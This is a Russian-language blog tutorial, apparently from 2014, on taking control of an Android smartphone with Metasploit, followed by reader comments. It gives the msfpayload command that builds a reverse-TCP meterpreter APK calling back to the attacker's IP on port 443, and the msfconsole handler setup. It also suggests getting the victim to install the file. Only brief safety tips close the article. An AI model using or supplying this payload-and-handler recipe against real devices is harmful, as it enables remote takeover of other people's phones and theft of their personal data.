Взламываем Android-смартфон с помощью Metasploit
в разделе: Open Source- Просмотров: 26667
- Подписаться на обновления
В наше время смартфоны уже давно перестали быть редкостью или роскошью, и конечно они стали лакомой целью для злоумышленников, т.к. в них сейчас храниться масса личной информации. Думаю и нам настало время испытать безопасность одного из популярных смартфонов под управлением Android.
Исходная информация:
IP адрес атакующего: 192.168.8.94
Порт атакующего: 443
Что понадобиться:
1. Metasploit framework (есть в Kali Linux)
2. Android-смартфон (на нашем столе HTC One с Android 4.4 KitKat)
Приступим к созданию эксплоита
1. Запускаем терминал
2. Создаем apk-пакет с данными, следующей командой:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.8.94 LPORT=443 R > hack.apk
Т.к. мы будем делать эксплоит с обратным подключением, т.е. смартфон жертвы должен будет соединиться с компьютером атакующего, нам надо создать слушатель на указанном порту, для этого выполняем следующие команды:
msfconsole
use exploit/multi/handle
set payload android/meterpreter/reverse_tcp
set lhost 192.168.8.94
set lport 443
exploit
(Команда exploit запускает прослушку входящих соединений на порту 443)
Далее нам надо каким-либо образом заставить жертву запустить hack.apk сделанный нами ранее.
После того как жертва запустит этот файл на экране появится что-то похожее на:
Это говорит о том, что смартфон соединился с нашим компьютером и теперь мы можем им управлять из нашей консоли, вот пример:
Итог
1. Никогда не устанавливайте apk-пакеты из неизвестных источников
2. Если уж вы задумали установить, что-то подозрительное, то вы всегда можете вскрыть apk файл в текстовом редакторе и изучить его исходный код.
Вот такие дела, всем удачи!
- « Kali Linux: Учимся использовать Websploit Framewor...
- Ищем уязвимости на веб-сервере с помощью Nikto »
-
Вторник, 03 Июнь 2014
Начал заниматься написанием - начало уже положено //thecurrent.ru/entry/vozvrashchaem-db-autopwn-v-metasploit-4-x.html
-
Для создания комментария войдите пожалуйста сначала в сайт с именем пользователя и паролем .
Здраствуйте, интересует 1 вопрос, а возможно ли как то проверить на одну уязвимость список айпи адресов, с помощью метасплоита, на примере выше описанной статьи.
Думаю многих читателей интересует ответ на данный вопрос.....